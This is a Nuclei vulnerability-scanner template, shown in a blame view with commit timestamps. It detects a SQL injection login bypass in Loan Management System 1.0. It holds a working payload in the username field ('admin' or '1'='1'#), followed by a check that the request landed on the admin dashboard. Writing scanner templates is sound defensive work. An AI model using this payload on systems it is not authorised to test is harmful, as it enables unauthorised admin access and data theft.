nuclei-templates/http/vulnerabilities/other/loancms-sqli.yaml

50 lines
1.4 KiB
YAML
Raw Normal View History

2022-07-20 11:07:42 +00:00
id: loancms-sqli
info:
name: Loan Management System 1.0 - SQL Injection
2022-07-20 11:07:42 +00:00
author: arafatansari
severity: critical
2022-07-20 11:07:42 +00:00
description: |
Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-20 12:38:25 +00:00
reference:
- https://www.exploit-db.com/exploits/50402
- https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-07-22 06:45:21 +00:00
metadata:
max-request: 2
2022-07-22 06:45:21 +00:00
verified: true
tags: auth-bypass,cms,packetstorm,edb,loancms,sqli
2022-07-20 11:07:42 +00:00
http:
2022-07-20 11:07:42 +00:00
- raw:
- |
POST /ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-07-20 07:43:09 +00:00
username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
2022-07-20 11:07:42 +00:00
2022-07-20 12:38:25 +00:00
- |
GET /index.php?page=home HTTP/1.1
Host: {{Hostname}}
2022-07-21 11:06:05 +00:00
cookie-reuse: true
2022-07-20 11:07:42 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-20 12:38:25 +00:00
- 'window.start_load'
2022-07-21 11:06:05 +00:00
- 'Welcome back Admin'
2022-07-20 12:38:25 +00:00
- 'Loan Management System'
2022-07-20 12:41:03 +00:00
condition: and
2022-07-20 11:07:42 +00:00
- type: word
2022-07-20 12:38:25 +00:00
part: body
2022-07-20 11:07:42 +00:00
words:
2022-07-20 12:38:25 +00:00
- 'login-form'
negative: true